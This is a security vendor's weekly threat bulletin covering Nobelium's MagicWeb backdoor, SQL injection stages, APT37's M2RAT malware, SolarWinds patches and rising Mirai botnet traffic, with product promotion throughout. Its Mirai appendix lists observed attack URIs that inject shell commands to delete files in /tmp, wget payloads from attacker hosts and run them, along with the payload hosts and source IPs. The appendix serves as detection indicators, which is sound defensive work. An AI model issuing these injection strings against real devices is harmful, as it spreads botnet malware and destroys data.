norm. threat bulletin: 08th March 2023

A deep dive into sophisticated tactics by Nobelium

Microsoft researchers recently provided insights into the Russia-linked Nobelium group’s threat ecosystem. The group, popularly known for the supply chain attack on SolarWinds, used a malicious tool MagicWeb for a sophisticated authentication bypass for Active Directory Federated Services (AD FS). The below findings reveal how they did it.

Nobelium used MagicWeb, an evolution of FoggyWeb, to implant a backdoor on the victim’s AD FS server. Nobelium accessed a vulnerable application through Azure AD App Proxy and then moved laterally to the AD FS servers using an AD privilege escalation vulnerability. It used a backdoor DLL with added .NET classes and static constructors and loaded it in the Global Assembly Cache (GAC), an obscure piece of .NET infrastructure. The loading into the AD FS process was made possible by editing a configuration file to specify a different public token. Additionally, the group utilised specially crafted, highly privileged, certifications to bypass the normal authentication process and move laterally through the network.

Microsoft stated that it first spotted MagicWeb in August 2022, when one of its customers fell victim to a post-compromise capability of MagicWeb. In this case, Nobelium was using the tool to maintain persistence access to their customers environment. Microsoft’s Detection and Response Team (DART) performed various data-wrangling actions followed by in-depth data analysis to understand strange authentication requests. They found that the tool is capable of exfiltrating the configuration database of compromised AD FS servers, decrypting token-signing/decryption certificates, and obtaining additional payloads from its C2 server.

The group remains highly active with their tools, conducting multiple cyberattacks in parallel, predominantly targeting government organizations, NGOs, IGOs, and think tanks across the U.S., Europe, and Central Asia. By utilising multiple smartbloc. modules such as Threat Detection and Response, Vulnerability Patch Management and Cyber Safety and Awareness, you can be as protected as possible against the likes of Nobelium and their tools.

Breaking down the seven steps of an SQL Injection Attack

Cyberattacks can cause immense damage to an organisation’s system and have only increased in frequency over recent years. SQL injection is an especially devastating example. This form of attack involves exploiting a website or application code through the use of Structured Query Language (SQL). It is considered one of the most severe cyber threats, as it can give attackers access to sensitive data stored within databases, allows them to modify or delete data and even create new user accounts. With these tools, attackers can gain control of the entire system.

Much like other cyberattacks, malicious actors carry out SQL injection attacks in various stages across the attack life cycle. By breaking down each stage and understanding how it works, organisations can better protect themselves while also improving their overall cybersecurity posture.

1. Reconnaissance – During the reconnaissance stage, attackers determine information about their targets, such as their weaknesses and vulnerabilities. During an SQL injection attack specifically, attackers use a wide variety of techniques to gain access to their target. Knowing the target’s weaknesses helps attackers focus their efforts to launch an effective attack faster and with less effort. Understanding what types of data are stored on a system or website will determine which type of malicious code attackers use against your system.
   
2. Weaponization – The weaponization stage occurs after an attacker has identified and exploited a vulnerability in your system. SQL attackers craft malicious payloads explicitly tailored for your environment. These payloads aim to bypass your organisation’s security measures, gain access to sensitive information, or disrupt operations. Attackers may use automated tools such as Metasploit to generate these payloads quickly and easily. Additionally, attackers may use automated tools and data extraction methods such as SQLmap or XSS attacks to inject these payloads into your system.
   
3. Delivery – The delivery stage involves sending malicious code or scripts to a targeted system to gain unauthorised access. These payloads include instructions for exploiting vulnerable web applications on the target system and gaining access to privileged information. The attacker may also use cross-site scripting (XSS) techniques to inject malicious code into web applications via client-side scripts such as JavaScript or HTML documents. This allows attackers to steal sensitive data, such as login credentials, by executing unauthorised commands on the server side of a website or application. During the delivery stages, attackers can modify existing application functions by manipulating user input before the server-side application accepts it.
   
4. Exploitation – Once the attacker has gained access to a company’s system, they will begin exploiting its resources. Depending on what type of information they have obtained, they may take control of entire databases or even entire networks. The threats posed by SQL injection attacks are further exacerbated if the malicious actors can leverage stolen credentials on existing systems or databases to create new user accounts with full privileges. With unrestricted access, they can create new user accounts with privileged access rights or modify existing user accounts with elevated privileges.
   
5. Installation – The installation stage occurs after the attacker successfully delivers the malicious payload to its target. During this phase, attackers will typically install backdoors on vulnerable systems to maintain access and execute additional commands without authorisation. Once the attacker has installed their backdoors, they will typically connect remotely and execute malicious commands without authorisation. If attackers can gain access to a system’s root directory, they can install any software of their choice and bypass most security measures.
   
6. Command & Control – The command-and-control stage occurs after an attacker has gained access to a vulnerable system but has not yet launched their malicious payloads. During this stage, an attacker will establish persistent remote access and mechanisms to maintain control over the compromised system, even if it is rebooted or its connection to the internet drops out even temporarily. At this point, an attacker may also collect more information or deploy additional malicious files to aid in their mission.
   
7. Actions on Objective – The actions on objective stage is the final stage of an SQL injection attack. During this stage, attackers will typically launch their malicious payloads and take whatever actions they desire. This may include accessing sensitive data, modifying existing configurations or executing malicious commands to gain further access to other systems in the network.

After this, the attackers will likely attempt to cover their tracks by deleting any evidence of their involvement. After completing their mission, they will typically disconnect from the remote access point and erase all traces of their activities. Although it is not unheard of for attackers to leave a dormant connection to their C2C server to enable any future attack.

By implementing strong security measures such as limiting access to privileged accounts and utilising norm.‘s Vulnerability Patch Management module, regularly scanning for vulnerable systems can help ensure that any attempt at an SQL injection attack is thwarted before it can do any significant damage.

RedEyes hackers use new malware to steal data from Windows

APT37, also known as ‘RedEyes’ is a North Korean cyber espionage hacking group believed to be state-supported. In 2022, the hacking group was seen exploiting Internet Explorer zero-days and distributing a wide assortment of malware against targeted entities and individuals. More recently they have been observed using new evasive ‘M2RAT’ malware and steganography to target individuals for intelligence collection.

The recent attacks started in January 2023, when the hacking group sent phishing emails containing a malicious attachment to their targets. Opening the attachment triggers the exploitation of an old EPS vulnerability, the exploit will cause shellcode to run on a victim’s computer that downloads and executes malicious code stored within a JPEG image. This JPG image file uses steganography, to stealthily introduce the M2RAT executable (“lskdjfei.exe”) onto the system and inject it into “explorer.exe”.

For persistence on the system, the malware adds a new value (“RyPO”) in the “Run” Registry key, with commands to execute a PowerShell script via “cmd.exe.” This same command was also seen in a 2021 Kaspersky report about APT37.

The M2RAT backdoor acts as a basic remote access trojan that performs keylogging, data theft, command execution, and the taking of screenshots from the desktop. The screenshot-snapping function is activated periodically and works autonomously without requiring a specific operator command.

The malware’s ability to scan for portable devices connected to the Windows computer, such as smartphones or tablets, is of particular interest. If a portable device is detected, it will scan the device’s contents for documents and voice recording files and, if found, copy them to the PC for exfiltration to the attacker’s server. Before exfiltration, the stolen data is compressed in a password-protected RAR archive, and the local copy is wiped from memory to eliminate any traces.

By utilising norm.‘s Threat Detection & Response module in combination with the Vulnerability Patch Management module, your systems will receive the latest security updates, resulting in attacks which utilise old vulnerabilities unsuccessful.

SolarWinds patches high severity vulnerabilities

After announcing earlier during the month, SolarWinds has published multiple advisories describing the high severity vulnerabilities which they have patched with a SolarWinds platform update.

Out of a total of seven security defects, five are described as deserialization of untrusted data issues that could be exploited to achieve command execution. Four of them have a CVSS score of 8.8.

Tracked as CVE-2023-23836, CVE-2022-47503, CVE-2022-47504 and CVE-2022-47507, the high-severity flaws could allow “a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands”, SolarWinds says. SolarWinds considers the fifth bug, which is tracked as CVE-2022-38111, a medium-severity issue, albeit the consequences of successful exploitation are the same. In addition, the flaw has a CVSS score of 7.2, which makes it ‘high severity’.

The company also announced patches for a high-severity path traversal vulnerability in the SolarWinds Platform, which is tracked as CVE-2022-47506 (CVSS score of 8.8). “This vulnerability allows a local adversary with authenticated account access to edit the default configuration, enabling the execution of arbitrary commands,” the company explains.

SolarWinds Platform 2023.1 resolves all vulnerabilities. By utilising norm.‘s Vulnerability Patch Management module, customers can ensure they are protected against all the aforementioned vulnerabilities.

norm. observes increase of Mirai botnet traffic

norm. has been tracking an increase of Mirai botnet traffic across our customer estates over the last week. This IoT-based botnet which first emerged in 2016 has been responsible for some of the largest DDoS (Distributed denial-of-service) attacks ever recorded with a reported 380,000 to 400,000 infected devices at its peak [1][2]. The source code for the Mirai botnet was leaked in 2016 on HackForum which has led to several new variants of Mirai seen in the wild [3].

Mirai serves two purposes after successfully infecting a target: perform discovery of IoT devices on the public internet and local networks and perform botnet functionality including DDoS attacks or bitcoin mining. Mirai usually targets DVR systems, routers, and CCTV systems.

norm. has seen Mirai targeting vulnerabilities within JAWS webserver, exploiting a HTTP request handling vulnerability to call back to an IP/domain hosting malware and other payloads. As an appendix to this week’s threat bulletin, you can find a series of IP address and domains that we have observed this week.

Recommendations

Avoid the use of default credentials across all devices and accounts. Mirai uses credential dictionaries for default accounts to gain access to poorly secured devices.

Get on top of firmware upgrades and software updates – IoT devices can often be deployed and forgotten. Mirai has been seen to abuse hard-coded credentials or firmware bugs. Check if your device vendor has released any security advisories or patches recently. Vulnerability management platforms, such as Qualys, automatically pick up on said vulnerabilities.

Verify if your IoT devices face the public internet – Mirai uses SSH (22), Telnet (23) and HTTP/S (80/443) to spread and perform attacks. Assess whether your devices should have these ports open on your internal devices and whether blanket firewall rules to block inbound SSH/Telnet should be used.

Top sources of Mirai traffic:

185[.]225[.]74[.]55

111[.]118[.]40[.]97

94[.]229[.]79[.]10

95[.]181[.]161[.]66

1[.]233[.]206[.]27

59[.]187[.]205[.]166

39[.]108[.]138[.]206

88[.]247[.]86[.]79

172[.]91[.]47[.]43

193[.]111[.]250[.]222

218[.]145[.]61[.]20

103[.]178[.]229[.]137

122[.]160[.]139[.]240

Targeted URIs of customer endpoints:

/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh

/cgi-bin/ViewLog[.]asp

/shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+ 107[.]6[.]255[.]132/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+ 100[.]43[.]163[.]61/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+update[.]rawupdater[.]cf/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+proxy[.]akur[.]group/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+5[.]255[.]105[.]240/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+http://192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun[.]top/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+212[.]87[.]204[.]103/lol[.]sh;sh+/tmp/lol[.]sh

/GponForm/diag_Form?images/

/shell?cd+/tmp;rm+-rf+*;wget+ 107[.]151[.]195[.]223/jaws;chmod+/tmp/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+109[.]122[.]221[.]134/jaws;sh+/tmp/jaws

/shell?cd+/tmp;rm+-rf+*;wget+http://175[.]9[.]53[.]170:42710/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

URIs hosting Mirai payloads:

http://175[.]9[.]53[.]170:42710/Mozi.a

109[.]122[.]221[.]134/jaws

107[.]151[.]195[.]223/jaws

212[.]87[.]204[.]103/lol[.]sh

heylitimysun[.]top/jaws

http://192[.]168[.]1[.]1:8088/Mozi.a

5[.]255[.]105[.]240/jaws

proxy[.]akur[.]group/jaws

137[.]175[.]17[.]190/jaws

update[.]rawupdater[.]cf/jaws

100[.]43[.]163[.]61/jaws

107[.]6[.]255[.]132/jaws

94[.]158[.]247[.]123/jaws

Sources

[1] Source Code for IoT Botnet ‘Mirai’ Released

[2] Mirai-Based Malware Continues to Dominate Botnet Variants, Report Finds

[3] Mirai Variant V3G4 Targets IoT Devices